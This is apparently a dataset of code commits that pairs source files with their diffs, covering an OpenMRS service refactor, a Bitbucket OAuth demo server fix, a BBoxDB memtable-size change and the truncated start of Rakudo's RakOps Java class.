MB"; } /** * @see org.openmrs.api.AdministrationService#purgeGlobalProperties(java.util.List) */ @Override public void purgeGlobalProperties(List<GlobalProperty> globalProperties) throws APIException { for (GlobalProperty globalProperty : globalProperties) { Context.getAdministrationService().purgeGlobalProperty(globalProperty); } } /** * @see AdministrationService#getMaximumPropertyLength(Class, String) */ @Override @Transactional(readOnly = true) public int getMaximumPropertyLength(Class<? extends OpenmrsObject> aClass, String fieldName) { return dao.getMaximumPropertyLength(aClass, fieldName); } /** * @see org.openmrs.api.AdministrationService#validate(java.lang.Object, Errors) */ @Override @Transactional(readOnly = true) public void validate(Object object, Errors errors) throws APIException { if (object == null) throw new APIException(Context.getMessageSourceService().getMessage("error.null")); dao.validate(object, errors); } /** * @see org.openmrs.api.AdministrationService#getSearchLocales(org.openmrs.User) */ @Override @Transactional(readOnly = true) public List<Locale> getSearchLocales() throws APIException { Set<Locale> locales = new LinkedHashSet<Locale>(); Locale currentLocale = Context.getLocale(); locales.add(currentLocale); //the currently used full locale //the currently used language locales.add(new Locale(currentLocale.getLanguage())); //add user's proficient locales User user = Context.getAuthenticatedUser(); if (user != null) { List<Locale> proficientLocales = user.getProficientLocales(); if (proficientLocales != null) { locales.addAll(proficientLocales); } } //limit locales to only allowed locales List<Locale> allowedLocales = getAllowedLocales(); if (allowedLocales != null) { Set<Locale> retainLocales = new HashSet<Locale>(); for (Locale allowedLocale : allowedLocales) { retainLocales.add(allowedLocale); retainLocales.add(new Locale(allowedLocale.getLanguage())); } locales.retainAll(retainLocales); } return new ArrayList<Locale>(locales); } @Override public void setImplementationIdHttpClient(HttpClient implementationIdHttpClient) { this.implementationIdHttpClient = implementationIdHttpClient; } }
TRUNK-2218: remove direct method calls in AdministrationServiceImpl class
api/src/main/java/org/openmrs/api/impl/AdministrationServiceImpl.java
TRUNK-2218: remove direct method calls in AdministrationServiceImpl class
<ide><path>pi/src/main/java/org/openmrs/api/impl/AdministrationServiceImpl.java <ide> @Deprecated <ide> @Transactional(readOnly = true) <ide> public List<GlobalProperty> getGlobalProperties() throws APIException { <del> return getAllGlobalProperties(); <add> return Context.getAdministrationService().getAllGlobalProperties(); <ide> } <ide> <ide> /** <ide> */ <ide> @Deprecated <ide> public void deleteGlobalProperty(String propertyName) throws APIException { <del> purgeGlobalProperty(new GlobalProperty(propertyName)); <add> Context.getAdministrationService().purgeGlobalProperty(new GlobalProperty(propertyName)); <ide> } <ide> <ide> /** <ide> * java.lang.String) <ide> */ <ide> public void setGlobalProperty(String propertyName, String propertyValue) throws APIException { <del> GlobalProperty gp = getGlobalPropertyObject(propertyName); <add> GlobalProperty gp = Context.getAdministrationService().getGlobalPropertyObject(propertyName); <ide> if (gp == null) { <ide> gp = new GlobalProperty(); <ide> gp.setProperty(propertyName); <ide> */ <ide> @Transactional(readOnly = true) <ide> public ImplementationId getImplementationId() throws APIException { <del> String property = getGlobalProperty(OpenmrsConstants.GLOBAL_PROPERTY_IMPLEMENTATION_ID); <add> String property = Context.getAdministrationService().getGlobalProperty( <add> OpenmrsConstants.GLOBAL_PROPERTY_IMPLEMENTATION_ID); <ide> <ide> // fail early if no gp has been defined yet <ide> if (property == null) <ide> // lazy-load the global locale list and initialize with current global property value <ide> if (globalLocaleList == null) { <ide> globalLocaleList = new GlobalLocaleList(); <del> addGlobalPropertyListener(globalLocaleList); <add> Context.getAdministrationService().addGlobalPropertyListener(globalLocaleList); <ide> } <ide> <ide> Set<Locale> allowedLocales = globalLocaleList.getAllowedLocales();
JavaScript
mit
2b82a7ca5ad373d10abc34e242ebfbf4aa3885c0
0
ajaxorg/node-bitbucket
var http = require("http"); var Url = require("url"); var querystring = require("querystring"); var BitBucket = require("../bitbucket").BitBucket; var OAuth = require("oauth").OAuth; var secrets = require("../bitbucket/secrets"); var bitbucket = new BitBucket(true); var repo = bitbucket.getRepoApi(); var PORT = process.env.C9_PORT || 7878; var oauth = new OAuth( "https://bitbucket.org/api/1.0/oauth/request_token/", //requestUrl, "https://bitbucket.org/api/1.0/oauth/access_token/", //accessUrl, secrets.oauth.clientId, //consumerKey, secrets.oauth.secret, //consumerSecret, "1.0", //version, "http://node-bitbucket.fjakobs.c9.io/bitbucket/callback", //authorize_callback, 'HMAC-SHA1' //signatureMethod, ); // for demo purposes use one global access token // in production this has to be stored in a user session var accessToken = ""; function getOAuthRequestToken(callback) { oauth.getOAuthRequestToken(callback) } getOAuthRequestToken(function(error, oauthToken, oauthTokenSecret, results) { console.log(arguments) http.createServer(function(req, res) { var url = Url.parse(req.url); var path = url.pathname; console.log(url); var query = querystring.parse(url.query); if (path == "/") { // redirect to bitbucket if there is no access token if (!accessToken) { res.writeHead(303, { Location: oauth.signUrl("https://bitbucket.org/!api/1.0/oauth/authenticate/", oauthToken, oauthTokenSecret, "GET") }); res.end(); return; } res.writeHead(200); res.end("Jippie"); // TODO use API /* user.show(function(err, user) { if (err) { res.writeHead(err.status); res.end(JSON.stringify(err)); return; } res.writeHead(200); res.end(JSON.stringify(user)); }); */ return; } // URL called by bitbucket after authenticating else if (path.match(/^\/bitbucket\/callback\/?$/)) { // upgrade the code to an access token oauth.getOAuthAccessToken(oauthToken, oauthTokenSecret, query.oauth_verifier, function(err, oauth_access_token, oauth_access_token_secret, results) { if (err) { console.log(err); res.writeHead(500); res.end(err + ""); return; } accessToken = oauth_access_token; // authenticate API bitbucket.authenticateOAuth(accessToken); console.log("accessToken", accessToken) //redirect back res.writeHead(303, { Location: "/" }); res.end(); }); return; } res.writeHead(404); res.end("404 - Not found"); }).listen(PORT, "0.0.0.0"); console.log("listening at http://localhost:" + PORT); });
demo/oauth.js
var http = require("http"); var Url = require("url"); var querystring = require("querystring"); var BitBucket = require("../bitbucket").BitBucket; var OAuth = require("oauth").OAuth; var secrets = require("../bitbucket/secrets"); var bitbucket = new BitBucket(true); var repo = bitbucket.getRepoApi(); var PORT = process.env.C9_PORT || 7878; var oauth = new OAuth( "https://bitbucket.org/api/1.0/oauth/request_token/", //requestUrl, "https://bitbucket.org/api/1.0/oauth/access_token/", //accessUrl, secrets.oauth.clientId, //consumerKey, secrets.oauth.secret, //consumerSecret, "1.0", //version, "http://node-bitbucket.fjakobs.c9.io/bitbucket/callback", //authorize_callback, "HMAC-SHA1" //signatureMethod, ); oauth.getOAuthRequestToken(function(error, oauth_token, oauth_token_secret, results) { console.log(arguments); // for demo purposes use one global access token // in production this has to be stored in a user session var accessToken = ""; http.createServer(function(req, res) { var url = Url.parse(req.url); var path = url.pathname; console.log(url); var query = querystring.parse(url.query); if (path == "/") { // redirect to bitbucket if there is no access token if (!accessToken) { res.writeHead(303, { Location: "https://bitbucket.org/api/1.0/oauth/authenticate?oauth_token=" + oauth_token }); res.end(); return; } // TODO use API /* user.show(function(err, user) { if (err) { res.writeHead(err.status); res.end(JSON.stringify(err)); return; } res.writeHead(200); res.end(JSON.stringify(user)); }); */ return; } // URL called by bitbucket after authenticating else if (path.match(/^\/bitbucket\/callback\/?$/)) { // upgrade the code to an access token oauth.getOAuthAccessToken(oauth_token, oauth_token_secret, oauth.verifier, function(err, oauth_access_token, oauth_access_token_secret, results) { if (err) { console.log(err); res.writeHead(500); res.end(err + ""); return; } accessToken = oauth_access_token; // authenticate API bitbucket.authenticateOAuth(accessToken); //redirect back res.writeHead(303, { Location: "/" }); res.end(); }); return; } res.writeHead(404); res.end("404 - Not found"); }).listen(PORT, "0.0.0.0"); console.log("listening at http://localhost:" + PORT); });
fix oauth
demo/oauth.js
fix oauth
<ide><path>emo/oauth.js <ide> secrets.oauth.secret, //consumerSecret, <ide> "1.0", //version, <ide> "http://node-bitbucket.fjakobs.c9.io/bitbucket/callback", //authorize_callback, <del> "HMAC-SHA1" //signatureMethod, <add> 'HMAC-SHA1' //signatureMethod, <ide> ); <ide> <del>oauth.getOAuthRequestToken(function(error, oauth_token, oauth_token_secret, results) { <del> console.log(arguments); <del> <del> // for demo purposes use one global access token <del> // in production this has to be stored in a user session <del> var accessToken = ""; <add>// for demo purposes use one global access token <add>// in production this has to be stored in a user session <add>var accessToken = ""; <add> <add>function getOAuthRequestToken(callback) { <add> oauth.getOAuthRequestToken(callback) <add>} <add> <add>getOAuthRequestToken(function(error, oauthToken, oauthTokenSecret, results) { <add> console.log(arguments) <ide> <ide> http.createServer(function(req, res) { <ide> var url = Url.parse(req.url); <ide> // redirect to bitbucket if there is no access token <ide> if (!accessToken) { <ide> res.writeHead(303, { <del> Location: "https://bitbucket.org/api/1.0/oauth/authenticate?oauth_token=" + oauth_token <add> Location: oauth.signUrl("https://bitbucket.org/!api/1.0/oauth/authenticate/", oauthToken, oauthTokenSecret, "GET") <ide> }); <ide> res.end(); <ide> return; <ide> } <ide> <add> res.writeHead(200); <add> res.end("Jippie"); <add> <ide> // TODO use API <ide> /* <ide> user.show(function(err, user) { <ide> // URL called by bitbucket after authenticating <ide> else if (path.match(/^\/bitbucket\/callback\/?$/)) { <ide> // upgrade the code to an access token <del> oauth.getOAuthAccessToken(oauth_token, oauth_token_secret, oauth.verifier, function(err, oauth_access_token, oauth_access_token_secret, results) { <add> oauth.getOAuthAccessToken(oauthToken, oauthTokenSecret, query.oauth_verifier, function(err, oauth_access_token, oauth_access_token_secret, results) { <ide> if (err) { <ide> console.log(err); <ide> res.writeHead(500); <ide> <ide> // authenticate API <ide> bitbucket.authenticateOAuth(accessToken); <add> console.log("accessToken", accessToken) <ide> <ide> //redirect back <ide> res.writeHead(303, {
Java
apache-2.0
9a7fb8ed4c734197cd48571d266ef801c527e936
0
jnidzwetzki/scalephant,jnidzwetzki/bboxdb,jnidzwetzki/bboxdb,jnidzwetzki/bboxdb,jnidzwetzki/scalephant
/******************************************************************************* * * Copyright (C) 2015-2017 the BBoxDB project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * *******************************************************************************/ package org.bboxdb; import java.net.InetAddress; import java.net.UnknownHostException; import java.util.Collection; import org.slf4j.Logger; import org.slf4j.LoggerFactory; public class BBoxDBConfiguration { /** * The root directory of the application */ protected String rootDirectory = "/tmp/bboxdb_test"; /** * The directory to store data */ protected String dataDirectory = "/tmp/bboxdb_test/data"; /** * The commit log dir */ protected String commitlogDir = "/tmp/bboxdb_test/commitlog"; /** * Number of entries per memtable */ protected int memtableEntriesMax = 10000; /** * Size of the memtable in bytes */ protected int memtableSizeMax = 128 * 1024 * 1014; /** * Start compact thread (can be disabled for tests) */ protected boolean storageRunCompactThread = true; /** * Start flush thread (can be disabled for tests - all data stays in memory) */ protected boolean storageRunMemtableFlushThread = true; /** * The classname of the spatial indexer */ protected String storageSpatialIndexerFactory = "none"; /** * The checkpoint interval */ protected int storageCheckpointInterval = 1800; /** * The port for client requests */ protected int networkListenPort = 50505; /** * The amount of threads to handle client connections */ protected int networkConnectionThreads = 10; /** * The name of the cluster */ protected String clustername; /** * The list of zookeeper nodes */ protected Collection<String> zookeepernodes; /** * The local IP address of this node. The default value is set in the constructor. */ protected String localip = null; /** * The sstable split strategy */ protected String regionSplitStrategy = "org.bboxdb.distribution.regionsplit.WeightBasedSplitStrategy"; /** * The resource placement strategy */ protected String resourcePlacementStrategy = "org.bboxdb.distribution.placement.RandomResourcePlacementStrategy"; /** * The maximum number of entries per SSTable */ protected int sstableMaxEntries = 1000; /** * The Logger */ private final static Logger logger = LoggerFactory.getLogger(BBoxDBConfiguration.class); public BBoxDBConfiguration() { try { localip = InetAddress.getLocalHost().getHostAddress(); } catch (UnknownHostException e) { logger.warn("Unable to determine the local IP adress of this node, please specify 'localip' in the configuration", e); } } public String getRootDirectory() { return rootDirectory; } public void setRootDirectory(final String rootDirectory) { this.rootDirectory = rootDirectory; } public String getDataDirectory() { return dataDirectory; } public void setDataDirectory(final String dataDirectory) { this.dataDirectory = dataDirectory; } public String getCommitlogDir() { return commitlogDir; } public void setCommitlogDir(final String commitlogDir) { this.commitlogDir = commitlogDir; } public int getMemtableEntriesMax() { return memtableEntriesMax; } public void setMemtableEntriesMax(final int memtableEntriesMax) { this.memtableEntriesMax = memtableEntriesMax; } public int getMemtableSizeMax() { return memtableSizeMax; } public void setMemtableSizeMax(final int memtableSizeMax) { this.memtableSizeMax = memtableSizeMax; } public boolean isStorageRunCompactThread() { return storageRunCompactThread; } public void setStorageRunCompactThread(final boolean storageRunCompactThread) { this.storageRunCompactThread = storageRunCompactThread; } public boolean isStorageRunMemtableFlushThread() { return storageRunMemtableFlushThread; } public void setStorageRunMemtableFlushThread( final boolean storageRunMemtableFlushThread) { this.storageRunMemtableFlushThread = storageRunMemtableFlushThread; } public int getNetworkListenPort() { return networkListenPort; } public void setNetworkListenPort(final int networkListenPort) { this.networkListenPort = networkListenPort; } public int getNetworkConnectionThreads() { return networkConnectionThreads; } public void setNetworkConnectionThreads(final int networkConnectionThreads) { this.networkConnectionThreads = networkConnectionThreads; } public String getStorageSpatialIndexerFactory() { return storageSpatialIndexerFactory; } public void setStorageSpatialIndexerFactory(String storageSpatialIndexerFactory) { this.storageSpatialIndexerFactory = storageSpatialIndexerFactory; } public String getClustername() { return clustername; } public void setClustername(final String clustername) { this.clustername = clustername; } public Collection<String> getZookeepernodes() { return zookeepernodes; } public void setZookeepernodes(final Collection<String> zookeepernodes) { this.zookeepernodes = zookeepernodes; } public String getLocalip() { return localip; } public void setLocalip(final String localip) { this.localip = localip; } public int getSstableMaxEntries() { return sstableMaxEntries; } public void setSstableMaxEntries(final int sstableMaxEntries) { this.sstableMaxEntries = sstableMaxEntries; } public String getRegionSplitStrategy() { return regionSplitStrategy; } public void setRegionSplitStrategy(final String regionSplitStrategy) { this.regionSplitStrategy = regionSplitStrategy; } public String getResourcePlacementStrategy() { return resourcePlacementStrategy; } public void setResourcePlacementStrategy(final String resourcePlacementStrategy) { this.resourcePlacementStrategy = resourcePlacementStrategy; } public int getStorageCheckpointInterval() { return storageCheckpointInterval; } public void setStorageCheckpointInterval(final int storageCheckpointInterval) { this.storageCheckpointInterval = storageCheckpointInterval; } }
src/main/java/org/bboxdb/BBoxDBConfiguration.java
/******************************************************************************* * * Copyright (C) 2015-2017 the BBoxDB project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * *******************************************************************************/ package org.bboxdb; import java.net.InetAddress; import java.net.UnknownHostException; import java.util.Collection; import org.slf4j.Logger; import org.slf4j.LoggerFactory; public class BBoxDBConfiguration { /** * The root directory of the application */ protected String rootDirectory = "/tmp/bboxdb_test"; /** * The directory to store data */ protected String dataDirectory = "/tmp/bboxdb_test/data"; /** * The commit log dir */ protected String commitlogDir = "/tmp/bboxdb_test/commitlog"; /** * Number of entries per memtable */ protected int memtableEntriesMax = 10000; /** * Size of the memtable in KB */ protected int memtableSizeMax = 128 * 1024; /** * Start compact thread (can be disabled for tests) */ protected boolean storageRunCompactThread = true; /** * Start flush thread (can be disabled for tests - all data stays in memory) */ protected boolean storageRunMemtableFlushThread = true; /** * The classname of the spatial indexer */ protected String storageSpatialIndexerFactory = "none"; /** * The checkpoint interval */ protected int storageCheckpointInterval = 1800; /** * The port for client requests */ protected int networkListenPort = 50505; /** * The amount of threads to handle client connections */ protected int networkConnectionThreads = 10; /** * The name of the cluster */ protected String clustername; /** * The list of zookeeper nodes */ protected Collection<String> zookeepernodes; /** * The local IP address of this node. The default value is set in the constructor. */ protected String localip = null; /** * The sstable split strategy */ protected String regionSplitStrategy = "org.bboxdb.distribution.regionsplit.WeightBasedSplitStrategy"; /** * The resource placement strategy */ protected String resourcePlacementStrategy = "org.bboxdb.distribution.placement.RandomResourcePlacementStrategy"; /** * The maximum number of entries per SSTable */ protected int sstableMaxEntries = 1000; /** * The Logger */ private final static Logger logger = LoggerFactory.getLogger(BBoxDBConfiguration.class); public BBoxDBConfiguration() { try { localip = InetAddress.getLocalHost().getHostAddress(); } catch (UnknownHostException e) { logger.warn("Unable to determine the local IP adress of this node, please specify 'localip' in the configuration", e); } } public String getRootDirectory() { return rootDirectory; } public void setRootDirectory(final String rootDirectory) { this.rootDirectory = rootDirectory; } public String getDataDirectory() { return dataDirectory; } public void setDataDirectory(final String dataDirectory) { this.dataDirectory = dataDirectory; } public String getCommitlogDir() { return commitlogDir; } public void setCommitlogDir(final String commitlogDir) { this.commitlogDir = commitlogDir; } public int getMemtableEntriesMax() { return memtableEntriesMax; } public void setMemtableEntriesMax(final int memtableEntriesMax) { this.memtableEntriesMax = memtableEntriesMax; } public int getMemtableSizeMax() { return memtableSizeMax; } public void setMemtableSizeMax(final int memtableSizeMax) { this.memtableSizeMax = memtableSizeMax; } public boolean isStorageRunCompactThread() { return storageRunCompactThread; } public void setStorageRunCompactThread(final boolean storageRunCompactThread) { this.storageRunCompactThread = storageRunCompactThread; } public boolean isStorageRunMemtableFlushThread() { return storageRunMemtableFlushThread; } public void setStorageRunMemtableFlushThread( final boolean storageRunMemtableFlushThread) { this.storageRunMemtableFlushThread = storageRunMemtableFlushThread; } public int getNetworkListenPort() { return networkListenPort; } public void setNetworkListenPort(final int networkListenPort) { this.networkListenPort = networkListenPort; } public int getNetworkConnectionThreads() { return networkConnectionThreads; } public void setNetworkConnectionThreads(final int networkConnectionThreads) { this.networkConnectionThreads = networkConnectionThreads; } public String getStorageSpatialIndexerFactory() { return storageSpatialIndexerFactory; } public void setStorageSpatialIndexerFactory(String storageSpatialIndexerFactory) { this.storageSpatialIndexerFactory = storageSpatialIndexerFactory; } public String getClustername() { return clustername; } public void setClustername(final String clustername) { this.clustername = clustername; } public Collection<String> getZookeepernodes() { return zookeepernodes; } public void setZookeepernodes(final Collection<String> zookeepernodes) { this.zookeepernodes = zookeepernodes; } public String getLocalip() { return localip; } public void setLocalip(final String localip) { this.localip = localip; } public int getSstableMaxEntries() { return sstableMaxEntries; } public void setSstableMaxEntries(final int sstableMaxEntries) { this.sstableMaxEntries = sstableMaxEntries; } public String getRegionSplitStrategy() { return regionSplitStrategy; } public void setRegionSplitStrategy(final String regionSplitStrategy) { this.regionSplitStrategy = regionSplitStrategy; } public String getResourcePlacementStrategy() { return resourcePlacementStrategy; } public void setResourcePlacementStrategy(final String resourcePlacementStrategy) { this.resourcePlacementStrategy = resourcePlacementStrategy; } public int getStorageCheckpointInterval() { return storageCheckpointInterval; } public void setStorageCheckpointInterval(final int storageCheckpointInterval) { this.storageCheckpointInterval = storageCheckpointInterval; } }
Updated default memtable size
src/main/java/org/bboxdb/BBoxDBConfiguration.java
Updated default memtable size
<ide><path>rc/main/java/org/bboxdb/BBoxDBConfiguration.java <ide> protected int memtableEntriesMax = 10000; <ide> <ide> /** <del> * Size of the memtable in KB <del> */ <del> protected int memtableSizeMax = 128 * 1024; <add> * Size of the memtable in bytes <add> */ <add> protected int memtableSizeMax = 128 * 1024 * 1014; <ide> <ide> /** <ide> * Start compact thread (can be disabled for tests)
Java
artistic-2.0
4cdb5585049a142cb22c5bda85b6a2c127b65645
0
tbrowder/rakudo,salortiz/rakudo,rakudo/rakudo,salortiz/rakudo,tbrowder/rakudo,rakudo/rakudo,rakudo/rakudo,MasterDuke17/rakudo,tbrowder/rakudo,salortiz/rakudo,rakudo/rakudo,rakudo/rakudo,salortiz/rakudo,tbrowder/rakudo,MasterDuke17/rakudo,tbrowder/rakudo,salortiz/rakudo,MasterDuke17/rakudo,MasterDuke17/rakudo,MasterDuke17/rakudo,rakudo/rakudo,salortiz/rakudo,tbrowder/rakudo,MasterDuke17/rakudo
package org.raku.rakudo; import java.util.ArrayList; import java.util.Arrays; import java.util.Calendar; import java.util.Comparator; import org.raku.nqp.runtime.*; import org.raku.nqp.sixmodel.*; import org.raku.nqp.sixmodel.reprs.CallCaptureInstance; import org.raku.nqp.sixmodel.reprs.ContextRefInstance; import org.raku.nqp.sixmodel.reprs.NativeRefInstance; import org.raku.nqp.sixmodel.reprs.VMArrayInstance; /** * Contains implementation of nqp:: ops specific to Rakudo */ @SuppressWarnings("unused") public final class RakOps { public static final boolean DEBUG_MODE = false; public static class ThreadExt { public SixModelObject firstPhaserCodeBlock; public ArrayList<CallFrame> prePhaserFrames = new ArrayList<CallFrame>(); public ThreadExt(ThreadContext tc) { } } public static class GlobalExt { public SixModelObject Mu; public SixModelObject Any; public SixModelObject Code; public SixModelObject Routine; public SixModelObject Signature; public SixModelObject Parameter; public SixModelObject Int; public SixModelObject Num; public SixModelObject Str; public SixModelObject List; public SixModelObject IterationBuffer; public SixModelObject Iterable; public SixModelObject Array; public SixModelObject Nil; public SixModelObject Map; public SixModelObject Hash; public SixModelObject Junction; public SixModelObject Scalar; public SixModelObject Capture; public SixModelObject ContainerDescriptor; public SixModelObject False; public SixModelObject True; public SixModelObject AutoThreader; public SixModelObject Positional; public SixModelObject PositionalBindFailover; public SixModelObject Associative; public SixModelObject EMPTYARR; public SixModelObject EMPTYHASH; public RakudoJavaInterop rakudoInterop; public SixModelObject JavaHOW; boolean initialized; public GlobalExt(ThreadContext tc) {} } public static ContextKey<ThreadExt, GlobalExt> key = new ContextKey< >(ThreadExt.class, GlobalExt.class); /* Parameter hints for fast lookups. */ private static final int HINT_CODE_DO = 0; private static final int HINT_CODE_SIG = 1; private static final int HINT_ROUTINE_RW = 8; private static final int HINT_SIG_PARAMS = 0; private static final int HINT_SIG_RETURNS = 1; private static final int HINT_SIG_CODE = 4; public static final int HINT_CD_OF = 0; public static final int HINT_CD_NAME = 1; public static final int HINT_CD_DEFAULT = 2; public static SixModelObject p6init(ThreadContext tc) { GlobalExt gcx = key.getGC(tc); if (!gcx.initialized) { tc.gc.contConfigs.put("value_desc_cont", new RakudoContainerConfigurer()); SixModelObject BOOTArray = tc.gc.BOOTArray; gcx.EMPTYARR = BOOTArray.st.REPR.allocate(tc, BOOTArray.st); SixModelObject BOOTHash = tc.gc.BOOTHash; gcx.EMPTYHASH = BOOTHash.st.REPR.allocate(tc, BOOTHash.st); gcx.rakudoInterop = new RakudoJavaInterop(tc.gc); gcx.initialized = true; } return null; } public static SixModelObject p6setitertype(SixModelObject type, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.Iterable = type; return type; } public static SixModelObject p6setassociativetype(SixModelObject type, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.Associative = type; return type; } public static SixModelObject p6setiterbuftype(SixModelObject type, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.IterationBuffer = type; return type; } public static SixModelObject p6settypes(SixModelObject conf, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.Mu = conf.at_key_boxed(tc, "Mu"); gcx.Any = conf.at_key_boxed(tc, "Any"); gcx.Code = conf.at_key_boxed(tc, "Code"); gcx.Routine = conf.at_key_boxed(tc, "Routine"); gcx.Signature = conf.at_key_boxed(tc, "Signature"); gcx.Parameter = conf.at_key_boxed(tc, "Parameter"); gcx.Int = conf.at_key_boxed(tc, "Int"); gcx.Num = conf.at_key_boxed(tc, "Num"); gcx.Str = conf.at_key_boxed(tc, "Str"); gcx.List = conf.at_key_boxed(tc, "List"); gcx.IterationBuffer = conf.at_key_boxed(tc, "IterationBuffer"); gcx.Iterable = conf.at_key_boxed(tc, "Iterable"); gcx.Array = conf.at_key_boxed(tc, "Array"); gcx.Nil = conf.at_key_boxed(tc, "Nil"); gcx.Map = conf.at_key_boxed(tc, "Map"); gcx.Hash = conf.at_key_boxed(tc, "Hash"); gcx.Junction = conf.at_key_boxed(tc, "Junction"); gcx.Scalar = conf.at_key_boxed(tc, "Scalar"); gcx.Capture = conf.at_key_boxed(tc, "Capture"); gcx.ContainerDescriptor = conf.at_key_boxed(tc, "ContainerDescriptor"); gcx.False = conf.at_key_boxed(tc, "False"); gcx.True = conf.at_key_boxed(tc, "True"); gcx.Associative = conf.at_key_boxed(tc, "Associative"); gcx.JavaHOW = conf.at_key_boxed(tc, "Metamodel").st.WHO.at_key_boxed(tc, "JavaHOW"); return conf; } public static SixModelObject p6setautothreader(SixModelObject autoThreader, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.AutoThreader = autoThreader; return autoThreader; } public static SixModelObject p6configposbindfailover(SixModelObject p, SixModelObject pbf, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.Positional = p; gcx.PositionalBindFailover = pbf; return p; } public static SixModelObject booleanize(int x, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); return x == 0 ? gcx.False : gcx.True; } public static SixModelObject p6definite(SixModelObject obj, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); return Ops.isnull(obj) == 1 || Ops.decont(obj, tc) instanceof TypeObject ? gcx.False : gcx.True; } public static SixModelObject p6box_i(long value, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject res = gcx.Int.st.REPR.allocate(tc, gcx.Int.st); res.set_int(tc, value); return res; } public static SixModelObject p6box_u(long value, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject res = gcx.Int.st.REPR.allocate(tc, gcx.Int.st); res.set_int(tc, value); return res; } public static SixModelObject p6box_n(double value, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject res = gcx.Num.st.REPR.allocate(tc, gcx.Num.st); res.set_num(tc, value); return res; } public static SixModelObject p6box_s(String value, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject res = gcx.Str.st.REPR.allocate(tc, gcx.Str.st); res.set_str(tc, value); return res; } public static SixModelObject p6argvmarray(ThreadContext tc, CallSiteDescriptor csd, Object[] args) { SixModelObject BOOTArray = tc.gc.BOOTArray; SixModelObject res = BOOTArray.st.REPR.allocate(tc, BOOTArray.st); for (int i = 0; i < csd.numPositionals; i++) { SixModelObject toBind; switch (csd.argFlags[i]) { case CallSiteDescriptor.ARG_INT: toBind = p6box_i((long)args[i], tc); break; case CallSiteDescriptor.ARG_UINT: toBind = p6box_u((long)args[i], tc); break; case CallSiteDescriptor.ARG_NUM: toBind = p6box_n((double)args[i], tc); break; case CallSiteDescriptor.ARG_STR: toBind = p6box_s((String)args[i], tc); break; default: toBind = Ops.hllize((SixModelObject)args[i], tc); break; } res.bind_pos_boxed(tc, i, toBind); } return res; } public static CallSiteDescriptor p6bindsig(ThreadContext tc, CallSiteDescriptor csd, Object[] args) { /* Do any flattening before processing begins. */ CallFrame cf = tc.curFrame; if (csd.hasFlattening) { csd = csd.explodeFlattening(cf, args); args = tc.flatArgs; } cf.csd = csd; cf.args = args; /* Look up parameters to bind. */ if (DEBUG_MODE) { if (cf.codeRef.name != null) System.err.println("Binding for " + cf.codeRef.name); } GlobalExt gcx = key.getGC(tc); SixModelObject sig = cf.codeRef.codeObject .get_attribute_boxed(tc, gcx.Code, "$!signature", HINT_CODE_SIG); SixModelObject params = sig .get_attribute_boxed(tc, gcx.Signature, "@!params", HINT_SIG_PARAMS); /* Run binder, and handle any errors. */ Object[] error = new Object[3]; switch (Binder.bind(tc, gcx, cf, params, csd, args, false, error)) { case Binder.BIND_RESULT_FAIL: if (error[0] instanceof String) { throw ExceptionHandling.dieInternal(tc, (String) error[0]); } else { Ops.invokeDirect(tc, (SixModelObject) error[0], (CallSiteDescriptor) error[1], (Object[]) error[2]); } case Binder.BIND_RESULT_JUNCTION: /* Invoke the auto-threader. */ csd = csd.injectInvokee(tc, args, cf.codeRef.codeObject); args = tc.flatArgs; Ops.invokeDirect(tc, gcx.AutoThreader, csd, args); Ops.return_o( Ops.result_o(cf), cf); /* Return null to indicate immediate return to the routine. */ return null; } /* The binder may, for a variety of reasons, wind up calling Raku code and overwriting flatArgs, so it needs to be set at the end to return reliably */ tc.flatArgs = args; return csd; } public static SixModelObject p6bindcaptosig(SixModelObject sig, SixModelObject cap, ThreadContext tc) { CallFrame cf = tc.curFrame; GlobalExt gcx = key.getGC(tc); CallSiteDescriptor csd = Binder.explodeCapture(tc, gcx, cap); SixModelObject params = sig.get_attribute_boxed(tc, gcx.Signature, "@!params", HINT_SIG_PARAMS); Object[] error = new Object[3]; switch (Binder.bind(tc, gcx, cf, params, csd, tc.flatArgs, false, error)) { case Binder.BIND_RESULT_FAIL: case Binder.BIND_RESULT_JUNCTION: if (error[0] instanceof String) { throw ExceptionHandling.dieInternal(tc, (String) error[0]); } else { Ops.invokeDirect(tc, (SixModelObject) error[0], (CallSiteDescriptor) error[1], (Object[]) error[2]); } default: return sig; } } public static long p6isbindable(SixModelObject sig, SixModelObject cap, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); CallSiteDescriptor csd; Object[] args; if (cap instanceof CallCaptureInstance) { CallCaptureInstance cc = (CallCaptureInstance)cap; csd = cc.descriptor; args = cc.args; } else { csd = Binder.explodeCapture(tc, gcx, cap); args = tc.flatArgs; } SixModelObject params = sig.get_attribute_boxed(tc, gcx.Signature, "@!params", HINT_SIG_PARAMS); SixModelObject codeObj = sig.get_attribute_boxed(tc, gcx.Signature, "$!code", HINT_SIG_CODE); CodeRef cr = (CodeRef)codeObj.get_attribute_boxed(tc, gcx.Code, "$!do", HINT_CODE_DO); CallFrame cf = new CallFrame(tc, cr); try { switch (Binder.bind(tc, gcx, cf, params, csd, args, false, null)) { case Binder.BIND_RESULT_FAIL: return 0; default: return 1; } } finally { tc.curFrame = tc.curFrame.caller; } } private static final CallSiteDescriptor STORE = new CallSiteDescriptor( new byte[] { 